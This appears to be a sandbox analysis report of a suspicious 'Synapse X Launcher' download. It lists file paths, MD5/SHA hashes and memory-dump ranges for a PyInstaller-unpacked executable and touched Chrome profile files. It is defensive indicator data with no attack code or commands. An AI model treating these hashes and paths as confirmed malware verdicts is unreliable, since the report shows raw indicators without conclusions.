| SHA1 | a92c4dc3df565cfeed1e15ea4ff059ba01fd9248 |
| SHA256 | 19f1853554fe7305eeed5dda5c8f0c01f51e2e14ca101f129ace3ae25f5c3d8d |
| SHA512 | e7c9da80f49c888db06da32da467f8166c5e10374c207e2b7ad29a32d504c97491d96d5c298f4e070f857bff045bf4af25391b69cad5d5d379bb3054c4da8803 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 95971dcfb515ead0c8870cf5b9876ece |
| SHA1 | 271bcd6af30010a4bde8d96c3033ac5cfea1dc89 |
| SHA256 | 88cf139a83877c4a9a4a41d1ecdbcce150c997cc79deb797667c423650a6df70 |
| SHA512 | 2e600f73bea9f38f92366fdadcb439eb2c3aa8d5f31b0de334a038a660fe012a5cf6f60fe0a00571d62f44076168712544315c54922bf3a17fd0f08793dfd3c7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | db95539072774887b0fc17856e68b0f9 |
| SHA1 | 8f7d0d1ec025a442bef90d87cf48fd749b2ba98a |
| SHA256 | 6d0c916fd36fbc7ce2786e74dbcd649bb13e5b4d3aa5e3d58669e0105b070e58 |
| SHA512 | 2c3dd79d84be356d0308387ec7a43057a75c0905ce9855badb1a01c666ccbde0c988abce2c31d7f80e6662416f9f4b752a58ec6863b4b0b12207c6ba2e522bcb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 151d473f095a75bb8a53fbc13536e7dd |
| SHA1 | e853e0cc17db12a736ccbff956187d4543d6c505 |
| SHA256 | 5bbdae5d31c5331913f2f684f81762d83279b0b1025dff86e424f05fd7d55703 |
| SHA512 | 03cd10f3e157e060677d9e67d6d34cd8ef7ed9299621a4b60f4bb5e519eac9a3250c6358ef89a89b4bd80ff1d64e3050e26e5db7e8ecb193d39b382c20320fb2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ec77cffcd1069ec69a9ce642bdb14605 |
| SHA1 | 1306f32979eecfbbe23f2b76fdf5a792a9a8ef98 |
| SHA256 | 3d2efd341680bedae72f7552dfc8eb3248fc9240bcdbd83cbd5a4371bba0c213 |
| SHA512 | 585fb975f0c3519552d0cb5531b33b0a25c744bec6da225c3e20e9e813e1f60bed2656ecb832421e5ff7d3b5131b49f9f765f06bb25c950bbb67e321ff0a8eb0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8f4c902ab2dfddc31f55a28d404b21e6 |
| SHA1 | 646e4524a3e7b09b040f96fbe81881db80083b00 |
| SHA256 | 1046254c54719d2b1275d680a33c042b5b4c9c7e7a0a2c6ec8164d721c6dcb6d |
| SHA512 | ee80b4b80caeb5f2dba4ab003c93d9af49ebaa9ddbca60901153f0ef0ce42a3f961cf43f49071f586d7b0d3acb0a0ae3cc130a1cc96d83fcc482ea4873fe1d18 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 96f45f691374064a60ae6c8987940b18 |
| SHA1 | ae148656dc56953f2e78bad8ca4910c235054da6 |
| SHA256 | 7493c728eeea53392e9a27500d45a96ebc0c06472cd7a721c5050d80695eff8e |
| SHA512 | 30ed9be797597fa87a83a36d4226c6ffdd860b544cdf8719ec596635cd10a9e06191991f6ceded5571cad15c320aeee24566c7b2426aa1482bfb39ceef0e30ad |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\4eb1de14-3287-4fed-8f4e-28ecac53d9db\index-dir\the-real-index
| MD5 | 787c86bc0c7f1c8c3d83c2462308d062 |
| SHA1 | 2db1be1e6219788254795b089aa4ce0a172ca918 |
| SHA256 | d5f2d539957add4c30070b1b23f32bae0caa3bbebfb77bf05db89be8b49d68cb |
| SHA512 | 5e86baf3e3abc3ebb58b39bb2d97616b8dfc673a6a97e88414b99f99829a885280669343f72e95612f57685e5de177d8ff765ed75e35a7c0bb69b699ce9cef97 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\4eb1de14-3287-4fed-8f4e-28ecac53d9db\index-dir\the-real-index~RFe59e7a7.TMP
| MD5 | 7b8f27c6d9352a60c20636dc1b5e0254 |
| SHA1 | 84051d799bb8e376e0c0c17652d6548bab577c75 |
| SHA256 | 38c33f88cf3b7ec72b205d96850b66d88b9290aed5fe00a6412c9d043d4949fb |
| SHA512 | b74038eb13a7613db3c00f99c78b9217973b30861015d981cc4635f2dac85b483ad0f54de11f2be0b9512811054a7b94e7c11f5e0b2964681bd88e60dbdb89cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 71cfe37fbdd7737456dadeb7921e96e1 |
| SHA1 | 33511941f85fb34f5711af1a5d4fc61cb9cfbbad |
| SHA256 | ff75d313d105fb4292e2f82162e8f6ea58a5692ad48e6c84805d9268e56467ce |
| SHA512 | 7d412c72be3fc97e802ffc33bc29c124c299c9ed119d49ada0805b2e50f7e77aca8348c3061f0710664f84395071eb2d972e0cded748a0aa9bcc1a7eca62f075 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\b66d48dc-db68-42e6-afde-8e1f4d534c1c.tmp
| MD5 | 6f053c9070d234e679243bbf0b66d127 |
| SHA1 | 8ac6cead1ff9f92eea7b7dc7235b58098beeabdd |
| SHA256 | 24228e5fcc0aac4a0a4adfa935d3129b06874d6aada4d89e8e0abc9b07243ca1 |
| SHA512 | a5c126f5218c526465773d18c18fac55558f4fcf294cef505ff7bb6f37f43c29c6c31f18e5e7a2dd339f5828da6c2e6a2ae213e4d09d1bd27054fcead9891e41 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | cd0deb90695bfd8998ae2a2e07b40010 |
| SHA1 | 8ef55c89af0a37c09a1dcf58e91a6bd04be1077e |
| SHA256 | cd4bf372738aba02c86d231b14669d87bef4547531d485835bc4495212d64d55 |
| SHA512 | a4e1c72b9230b0c232320c5d8daf6c92891df1d75c88c997be5c20a0e7f6ba0a2a606dfd7430c1db208f4a5e8676c36da7403ef3afc14fae2981989788adebde |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 68919a61cd89d37699cd8e4bb6c34839 |
| SHA1 | e7433708d40164aa1cd54a4898af45073be00679 |
| SHA256 | ea6b1ccb6156a6347970c5fff6b946d0b5f0ae32710a4b6aac639d7f10ee99a5 |
| SHA512 | 74607788615563a5ca26eb63ee01b9c7814b8ddc0eb5a432ebe1f4f754c3037f190913e229f96adb77e20d27ac21b254989f8f6465dd2a5356a855c49836e2f7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6b46ac5c1e61635c879501758c32a95f |
| SHA1 | 12504a2f442b4aac75ea6bbb8f39e178657980db |
| SHA256 | 63fbb022829793ecdfea1d26e238ef23cac8ab970fa08724c68f164e42ad0f57 |
| SHA512 | 99d4098c9e61ca2433f1cf6d9540267e3ebccf7d086b1575ae106a4cf42b1d6146817189c8b7896cc848765bbaff5b3179157d1acc3b5ee03e823afc378ca01f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ff56dc4b403167bb8ef4a5476e643060 |
| SHA1 | 5b8c79b43cce90a8942323294600b5f9bdc5c1e5 |
| SHA256 | 7276733c5581e460cf496756778a5ba93cee552970a9c166339f40b098af98e7 |
| SHA512 | fc402fe95dd6303ab7cc80a6c89a8ed8076eeb92927892cd000f58492d667f89dbe0bc4c03ecd7a566f164f6dc96bcef3a5ee9808a0ea86af2593b356c9a8dbb |
C:\Users\Admin\Downloads\Synapse.zip.crdownload
| MD5 | c3b667caa7ca27f8d8c7cc53bab22055 |
| SHA1 | fd4c2528394da8230c9e4cd5f7e8a3fbb312f32f |
| SHA256 | 2057a148d31050440e3d3b178afa9af21871d6ef890ca3eef233b867aa3dfd30 |
| SHA512 | 70b92aa79deddf93bd2a6f520f972a62f0d21121e0974056ca2287f131cfb02a500d801d16b1bbd5c57e94614ad98b0634032848f048b86e2cfadd37b41f49ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4f2e926ca23c92955941fd01004c3f4a |
| SHA1 | 3a2723b581c549029cf2bcafdbe12f4df0e24705 |
| SHA256 | 24527f08216d502beca614ccccea0b75fa3c0266b9b608a4cd00e40e2c0686ec |
| SHA512 | d8bc3845ead280f29b7d60f2bc349916de288855acfcdbc27594f49f858bc6afec5a7bf6a55346e45b9eaab803d860c00e1f738a53e1fb7934334700187b3dd0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | af9d2b774c1a01826cbe1a7fb414ea4b |
| SHA1 | 28ece5824a2aafae01c79f7628487e59ab7ef5fb |
| SHA256 | dab0719b99d6a6890cedb5d8cddafd8437d684d14a9a3fde8c57e540627e8735 |
| SHA512 | a356216b22e3d0331db7c85c926b81bb0df184dfcb8f5b611656ddb162070898c2afd3ef93138bc61d2f4a2eae7b355ac476803ffdf392fed012d759f4d7b205 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6fba0396b418a0a1f66868f3ab78beec |
| SHA1 | 054369cd534225b89cf77ad6f22e9a42c8eb212f |
| SHA256 | 7d5ad34de7d32565410a99b70ac11ea6f50a4f66f25fb9f5d8e890dfead23fff |
| SHA512 | aff277f889d9fdefde915dc91fd38c6d9b7cf1cbd864da449b88f2b95912747adbba6a7ed89094fddca6792e501688e495aeae79226f5d42e924b9b8f2b84a9e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000074
| MD5 | 279a08187fe6dd2fc9af819e4a104b4d |
| SHA1 | 9d3cd1b396cefa97cd2de96a327da6daa457950c |
| SHA256 | ea3b8ac34dd2156a5c83cc7d282db609ac01c87e45d129839630580e7cfefddc |
| SHA512 | 9c19e345474f6535253fa4c6ff1a230069752b7c34141924a90c1c54975c26759851cd618d10af601c3b169593b935364fce8b0662d3282ef4520e23c3b0fe37 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ff30412a31ee57705f1e9db020ef0d29 |
| SHA1 | 0c97f34ba63fd630541bd73aa50fe1136e6e9d7f |
| SHA256 | f7f6c9db29f73e47529067bb2fb323acc26e5497aa03119c206f877b89a3d5c2 |
| SHA512 | fa98d7bff0c55d9eabc70f6b0430f6aa0aa2c46729d3f703167391870d83e2716e0e0154b5520efbfd547a779d7bcda7a5f87791525b234ec687ca0fdba744e5 |
C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe
| MD5 | ee1ae8b61b9ee8049ced93511d820e5f |
| SHA1 | 4c77d025a844c252c7e5b1746addeca52c99ac0f |
| SHA256 | f316116c0e1b424d26dbdd379b0bae88acc738c7c98d387f165a91c741bf580b |
| SHA512 | e7289477563a4bca5ad7850056ac6b6931cd00ae020ca5f4ec71338fd1ffbf8eb14812ae9b35d76c3ad827f5c6024c3113d137c932dbfc8baa76524753a7853c |
C:\Users\Admin\AppData\Local\Temp\_MEI40602\python310.dll
| MD5 | bbcb74867bd3f8a691b1f0a394336908 |
| SHA1 | aea4b231b9f09bedcd5ce02e1962911edd4b35ad |
| SHA256 | 800b5e9a08c3a0f95a2c6f4a3355df8bbbc416e716f95bd6d42b6f0d6fb92f41 |
| SHA512 | 00745ddd468504b3652bdda757d42ebe756e419d6432ceb029ed3ccde3b99c8ae21b4fc004938bb0babaa169768db385374b29ac121608c5630047e55c40f481 |
C:\Users\Admin\AppData\Local\Temp\_MEI40602\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/3476-1836-0x00007FFAEF2E0000-0x00007FFAEF74E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\base_library.zip
| MD5 | d27716e8528ca4f16ae35736d9aad0d4 |
| SHA1 | 493f0dc645ff3f5d742ef77a5be6170a5d5c5575 |
| SHA256 | af91670cc1e2ab68abbab742f28f30c153545c6984b55832ac1120a62c1a19fd |
| SHA512 | 5cdaa2e83d37fc356366c5ae2643c43a249d140d594a33fbddac03d163754faea39f78d2b97955619cd6059de72c10b1930bdf779c13c323cc2cdb3267c2b60e |
C:\Users\Admin\AppData\Local\Temp\_MEI40602\python3.DLL
| MD5 | c17b7a4b853827f538576f4c3521c653 |
| SHA1 | 6115047d02fbbad4ff32afb4ebd439f5d529485a |
| SHA256 | d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68 |
| SHA512 | 8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7 |
C:\Users\Admin\AppData\Local\Temp\_MEI40602\_ctypes.pyd
| MD5 | 34bc30cb64fb692589e6df7cf62f14af |
| SHA1 | e42884b73090ee37ead7743f161491f04500cdb7 |
| SHA256 | 5d5c80b2e8a1cf081aa41c35c48f73df384cf526f358e91f80ba2ad48b6e52f7 |
| SHA512 | 69a6bb5689f33bfa13e5ef9532632a82cd26983d73e2d9ad920588840d7636c86f224553d3cc988e7500bbee9d67d15deb3382af03675e97043cd59707924c2f |
memory/3476-1846-0x00007FFB09680000-0x00007FFB0968F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\_lzma.pyd
| MD5 | 73eb1d56265f92ceef7948c5b74a11c1 |
| SHA1 | a1d60de9930fd9ed9be920c4d650d42fe07ebc22 |
| SHA256 | ee390c28c14e0c33a5601f12eb5d04bdff0ecfb334ce402f4380b8e0ebf7d4de |
| SHA512 | ebc9bc622ad7ef27b16b85db2be7b1f68f2b5de9de5eb2684b5fb3a02e9e851a939f63459cc2eb911263e799ff2c4a918ae98141f61132eb3d110828741f833f |
memory/3476-1852-0x00007FFB00A90000-0x00007FFB00ABD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\_socket.pyd
| MD5 | 26a6147d9ffd545fd80c9ed664d66d06 |
| SHA1 | b17b5ec05c012210adb7f0408273d0a40ae4f755 |
| SHA256 | 35f18dd2452642cefb6f883afc74d560e22aa71bdb6b26e63b076d7ea4246d38 |
| SHA512 | 447c72662de5fcffa07da8682e4d08f8ced791bfba9a742529766527e5d41ccfef5fa694c8a88bb8798c53c9fc48c33f57dd6c74b5dc49e8f8b15832593e155c |
memory/3476-1850-0x00007FFB01270000-0x00007FFB01289000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\select.pyd
| MD5 | a3837dc2e2a80fd286c2b07f839738a2 |
| SHA1 | b80a20896de81beab905439013adb9e9421f1d2f |
| SHA256 | eee7c64ef7de30dbda1d826bb3b1c3282602d9ef86e5e999a0cd6551287f29d8 |
| SHA512 | b14922e30b138401d7b301365644174c3a4b32872fc5688b22ffe759fdfd906f2fa91029f8f6ea235428f07519875aaeb2c4cdb786ca676d4f3ee9d81cddc96d |
memory/3476-1858-0x00007FFB08670000-0x00007FFB0867D000-memory.dmp
memory/3476-1857-0x00007FFB00E20000-0x00007FFB00E39000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\pyexpat.pyd
| MD5 | bca9783990260b2bc48475fb919c036b |
| SHA1 | 5e1d9c5250724906bfe92821544ddafcd11cdbd8 |
| SHA256 | 6266dc31c5774e2ea835092cf3f5f80c06afb423cc18ef372c7cfec1596bda55 |
| SHA512 | 5bb3c5fa7e4f8ff5fde2511dde40b45a7ce8dff38ad8a02e541bd2ac2e712f65635b0ce44643cc5d4c316874af47759da31c25dead5282ae3f370f3f57a498c8 |
memory/3476-1860-0x00007FFAFD5F0000-0x00007FFAFD624000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\_bz2.pyd
| MD5 | 13f9af35bc2ca51e1a0d9f912280832b |
| SHA1 | 3b94ed1baa8c1dd1cc9ba73800127367f28177e6 |
| SHA256 | 5cfa3e2d465614a5f7bdbfe8bbbae012d075bbe83d9561da3f93f4c19f9b94b3 |
| SHA512 | 0234136e9944963d672bb45abb76540a3ca82dcbc16d6f6185195316f2280253f02173840ccee8db7601f08b08c753b4d46a206e5d2ffbaa40b62e7599e1c3d7 |
memory/3476-1862-0x00007FFAFCDF0000-0x00007FFAFCE1E000-memory.dmp
memory/3476-1863-0x00007FFAF2AA0000-0x00007FFAF2B5C000-memory.dmp
memory/3476-1861-0x00007FFB07A00000-0x00007FFB07A0D000-memory.dmp
memory/3476-1845-0x00007FFB01470000-0x00007FFB01494000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI40602\libffi-7.dll
| MD5 | ce7d4f152de90a24b0069e3c95fa2b58 |
| SHA1 | 98e921d9dd396b86ae785d9f8d66f1dc612111c2 |
| SHA256 | 85ac46f9d1fd15ab12f961e51ba281bff8c0141fa122bfa21a66e13dd4f943e7 |
| SHA512 | 7b0a1bd9fb5666fe5388cabcef11e2e4038bbdb62bdca46f6e618555c90eb2e466cb5becd7773f1136ee929f10f74c35357b65b038f51967de5c2b62f7045b1f |
memory/3476-1865-0x00007FFAF32E0000-0x00007FFAF330B000-memory.dmp
memory/3476-1864-0x00007FFAEF2E0000-0x00007FFAEF74E000-memory.dmp
memory/3476-1867-0x00007FFAEF220000-0x00007FFAEF2D8000-memory.dmp
memory/3476-1866-0x00007FFAF09B0000-0x00007FFAF09DE000-memory.dmp
memory/3476-1870-0x000002291B720000-0x000002291BA95000-memory.dmp
memory/3476-1869-0x00007FFAEEEA0000-0x00007FFAEF215000-memory.dmp
memory/3476-1868-0x00007FFB01470000-0x00007FFB01494000-memory.dmp
memory/3476-1871-0x00007FFB00970000-0x00007FFB00985000-memory.dmp
memory/3476-1875-0x00007FFB051F0000-0x00007FFB05200000-memory.dmp
memory/3476-1874-0x00007FFB00A90000-0x00007FFB00ABD000-memory.dmp
memory/3476-1879-0x00007FFB08670000-0x00007FFB0867D000-memory.dmp
memory/3476-1881-0x00007FFAFD5F0000-0x00007FFAFD624000-memory.dmp
memory/3476-1882-0x00007FFAEED80000-0x00007FFAEEE98000-memory.dmp
memory/3476-1880-0x00007FFAF0980000-0x00007FFAF09A5000-memory.dmp
memory/3476-1878-0x00007FFB05120000-0x00007FFB0512B000-memory.dmp
memory/3476-1877-0x00007FFAFF9B0000-0x00007FFAFF9C4000-memory.dmp
memory/3476-1876-0x00007FFB00E20000-0x00007FFB00E39000-memory.dmp
memory/3476-1883-0x00007FFAEFF50000-0x00007FFAEFFE3000-memory.dmp
memory/3476-1884-0x00007FFAF2AA0000-0x00007FFAF2B5C000-memory.dmp
memory/3476-1885-0x00007FFAF2A80000-0x00007FFAF2A9C000-memory.dmp
memory/3476-1887-0x00007FFAF09B0000-0x00007FFAF09DE000-memory.dmp
memory/3476-1892-0x00007FFAEEB10000-0x00007FFAEED7B000-memory.dmp
memory/3476-1891-0x000002291B720000-0x000002291BA95000-memory.dmp
memory/3476-1894-0x00007FFAEFA20000-0x00007FFAEFA36000-memory.dmp
memory/3476-1899-0x00007FFB00A80000-0x00007FFB00A8E000-memory.dmp
memory/3476-1901-0x00007FFAEED80000-0x00007FFAEEE98000-memory.dmp
memory/3476-1921-0x00007FFAEFF40000-0x00007FFAEFF4F000-memory.dmp
memory/3476-1920-0x00007FFAEE9A0000-0x00007FFAEE9B7000-memory.dmp
memory/3476-1922-0x00007FFAEE810000-0x00007FFAEE996000-memory.dmp
memory/3476-1929-0x00007FFAEE730000-0x00007FFAEE759000-memory.dmp
memory/3476-1931-0x00007FFAEE710000-0x00007FFAEE72F000-memory.dmp
memory/3476-1932-0x00007FFAEE590000-0x00007FFAEE701000-memory.dmp
memory/3476-1930-0x00007FFAEFA00000-0x00007FFAEFA14000-memory.dmp
memory/3476-1928-0x00007FFAEEB10000-0x00007FFAEED7B000-memory.dmp
memory/3476-1934-0x00007FFAEE550000-0x00007FFAEE588000-memory.dmp
memory/3476-1933-0x00007FFAEEAF0000-0x00007FFAEEB01000-memory.dmp
memory/3476-1927-0x00007FFAEE760000-0x00007FFAEE76E000-memory.dmp
memory/3476-1950-0x00007FFAEE450000-0x00007FFAEE45D000-memory.dmp
memory/3476-1949-0x00007FFAEE460000-0x00007FFAEE46C000-memory.dmp
memory/3476-1948-0x00007FFAEE470000-0x00007FFAEE47C000-memory.dmp
memory/3476-1947-0x00007FFAEE480000-0x00007FFAEE48B000-memory.dmp
memory/3476-1946-0x00007FFAEE490000-0x00007FFAEE49B000-memory.dmp
memory/3476-1945-0x00007FFAEE4A0000-0x00007FFAEE4AC000-memory.dmp
memory/3476-1944-0x00007FFAEE4B0000-0x00007FFAEE4BC000-memory.dmp
memory/3476-1943-0x00007FFAEE4C0000-0x00007FFAEE4CE000-memory.dmp
memory/3476-1942-0x00007FFAEE4D0000-0x00007FFAEE4DD000-memory.dmp
memory/3476-1941-0x00007FFAEE4E0000-0x00007FFAEE4EC000-memory.dmp
memory/3476-1940-0x00007FFAEE4F0000-0x00007FFAEE4FB000-memory.dmp
memory/3476-1939-0x00007FFAEE500000-0x00007FFAEE50C000-memory.dmp
memory/3476-1938-0x00007FFAEE510000-0x00007FFAEE51B000-memory.dmp
memory/3476-1937-0x00007FFAEE520000-0x00007FFAEE52C000-memory.dmp
memory/3476-1936-0x00007FFAEE530000-0x00007FFAEE53B000-memory.dmp
memory/3476-1935-0x00007FFAEE540000-0x00007FFAEE54B000-memory.dmp
memory/3476-1926-0x00007FFAEE770000-0x00007FFAEE784000-memory.dmp
memory/3476-1925-0x00007FFAEE790000-0x00007FFAEE7E4000-memory.dmp
memory/3476-1924-0x00007FFAEF9F0000-0x00007FFAEF9FF000-memory.dmp
memory/3476-1923-0x00007FFAF0960000-0x00007FFAF0971000-memory.dmp
memory/3476-1919-0x00007FFAEE9C0000-0x00007FFAEE9D5000-memory.dmp
memory/3476-1918-0x00007FFAF3140000-0x00007FFAF3150000-memory.dmp
memory/3476-1917-0x000000006A880000-0x000000006A8AB000-memory.dmp
memory/3476-1916-0x00007FFAEFF50000-0x00007FFAEFFE3000-memory.dmp
memory/3476-1915-0x00007FFAFCDE0000-0x00007FFAFCDEE000-memory.dmp
memory/3476-1914-0x00007FFAEE9E0000-0x00007FFAEE9F6000-memory.dmp
memory/3476-1913-0x00007FFAF32D0000-0x00007FFAF32DE000-memory.dmp
memory/3476-1912-0x00007FFAF8510000-0x00007FFAF851E000-memory.dmp
memory/3476-1911-0x00007FFAF8BC0000-0x00007FFAF8BCF000-memory.dmp
memory/3476-1910-0x00007FFAFB110000-0x00007FFAFB11E000-memory.dmp
memory/3476-1909-0x0000000062E80000-0x0000000062EA8000-memory.dmp
memory/3476-1908-0x0000000068B40000-0x0000000068B81000-memory.dmp
memory/3476-1907-0x00007FFAEEA00000-0x00007FFAEEA11000-memory.dmp
memory/3476-1906-0x00007FFAEEA20000-0x00007FFAEEA34000-memory.dmp
memory/3476-1905-0x00007FFAEEA40000-0x00007FFAEEA56000-memory.dmp
memory/3476-1904-0x00007FFAEEA60000-0x00007FFAEEAA4000-memory.dmp
memory/3476-1903-0x00007FFAEEAB0000-0x00007FFAEEAC5000-memory.dmp
memory/3476-1902-0x00007FFAEEAD0000-0x00007FFAEEAEB000-memory.dmp
memory/3476-1900-0x00007FFAF0980000-0x00007FFAF09A5000-memory.dmp
memory/3476-1898-0x00007FFAEEAF0000-0x00007FFAEEB01000-memory.dmp
memory/3476-1897-0x00007FFB01460000-0x00007FFB0146C000-memory.dmp
memory/3476-1896-0x00007FFB01FD0000-0x00007FFB01FDF000-memory.dmp
memory/3476-1895-0x00007FFAEFA00000-0x00007FFAEFA14000-memory.dmp
memory/3476-1893-0x00007FFB00970000-0x00007FFB00985000-memory.dmp
memory/3476-1890-0x00007FFAEEEA0000-0x00007FFAEF215000-memory.dmp
memory/3476-1889-0x00007FFAF0960000-0x00007FFAF0971000-memory.dmp
memory/3476-1888-0x00007FFAEF220000-0x00007FFAEF2D8000-memory.dmp
memory/3476-1886-0x00007FFB01FF0000-0x00007FFB01FFA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e20cb8b3e4a2757cff94ba7eb37598a6 |
| SHA1 | 8e73e71db8acd23e896a66ed216eee46df6aa8a6 |
| SHA256 | 1b0840b0f8a5f3e45173ffa5745f2dca4bd53c22ce9612c8077719b377b346e5 |
| SHA512 | 6496fc2651e9ac9611071ebf8229ecbc6cfe8e424d14fcde011a1615191a589760d8039df129086651cbeed697408f09e7d0a93b3784273317545c035fc5817b |
memory/3476-1986-0x00007FFAEF220000-0x00007FFAEF2D8000-memory.dmp
memory/3476-1987-0x00007FFAEEEA0000-0x00007FFAEF215000-memory.dmp
memory/3476-1985-0x00007FFAF09B0000-0x00007FFAF09DE000-memory.dmp
memory/3476-1983-0x00007FFAF2AA0000-0x00007FFAF2B5C000-memory.dmp
memory/3476-1973-0x00007FFAEF2E0000-0x00007FFAEF74E000-memory.dmp
memory/3476-1978-0x00007FFB00E20000-0x00007FFB00E39000-memory.dmp
memory/3476-1974-0x00007FFB01470000-0x00007FFB01494000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000044
| MD5 | bc8ec6d0e3f746a78c43cf4f98312a02 |
| SHA1 | 22a3fdaf7f8e3176fbcd24c760214736e78ac8dd |
| SHA256 | bfd346deaeb1162c3c5d895c452e104f3824cc8e4d737ca78a4800d0f1c74b21 |
| SHA512 | 5598235c508347c310348c3fabed174c39f639e4ba3513f4419332aa5d4fa4e925945eeb0f4b56bed923b84504d3aed5d5f5d70e27406a194fdbdb3f5c10cfc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
| MD5 | 923a543cc619ea568f91b723d9fb1ef0 |
| SHA1 | 6f4ade25559645c741d7327c6e16521e43d7e1f9 |
| SHA256 | bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd |
| SHA512 | a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008
| MD5 | 88358c3a7a7a5906a8173bb9b9ebabd7 |
| SHA1 | 5b2ceac8c22d4d965427f7288becdee950945f4c |
| SHA256 | fb4c4631f542983c7a16ceff9dcba3b3c349581e657fef610988d94e418beb71 |
| SHA512 | 85bbe0167bbcf1966ff9dff22cb0c3d7d833cab7910cb7609e87beb74ff8a260fa7b9fdd7c01283f26bcd88a30e581f554329cb09bcce3c7de464d632fa55dd0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | f203d75a70ada036423e83070526987a |
| SHA1 | 06e072c8d3880fb8cab740f01308fc44cd211029 |
| SHA256 | 9eba99bb152b450919ff7bddc78c09e5eb0c857659b4fd593c94087d289ab255 |
| SHA512 | aba05ffe088c648093719cf2d25fdf46a7055583aa496dc8ef6b15c2ccae8d82c91d102edeec3bca5d6556a90c6d9cb03d688f5ba83f7fa87e1745c06a6d5f04 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009
| MD5 | 0b2e2830b49157b749d4fa079d002751 |
| SHA1 | 451b221024d9f7113768c362b4d4ba359afdc6a1 |
| SHA256 | 5abdd199b880ecff2fa55b6be4dd1bbf3764c514afe2d82459789aa3ae0283be |
| SHA512 | b5aeb124e57588cec624af434430d48e3d0bc3cd071196d56d0e65a9ebf2ce41fb254fb88d3ef9449f3d03e5809d56de280db69e1429cb1b9f488777e57d05cf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6c599a94e09e6dac58b73f45a910840b |
| SHA1 | e37aa5a9a41ddf3565b6c98df1408600bc2f47fa |
| SHA256 | 045a4ca75a84f62267127f79cb97fb266af5dc5a1bd627f9a1927a587a5c6383 |
| SHA512 | b3cc67fa70009710e7467d1841e3db93b0a4bf12e72d023970a7d264a38e497077def72b74424c8c20b6d651b5e28fb5e50684a347ad591ae4d878167a494517 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e0eaf8b80d560bf1f5fef225385da0cc |
| SHA1 | b3aa2cd69c6394325b7f797bf0c8adecefbb23d0 |
| SHA256 | fa9e45e145fcdae26056b08ee214681f7d50cd477ac25c982a811e86072413d6 |
| SHA512 | 166974b902892ee7db7fb1e2fde5fdd25532ff73d7c7d243f8cb341ad866f5296c825627ec8030b234d4d7512f2d33cc526c4023412b1c6653fada9112f122b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 40d22e54a8c38ab53b30645e6ef5b5c1 |
| SHA1 | 708d77fb1b6e9d4a522a75f1746de60c241fd738 |
| SHA256 | db15d9c10edea1c44db43feac09f177da511127178c4fb593a5048c9d3ab37af |
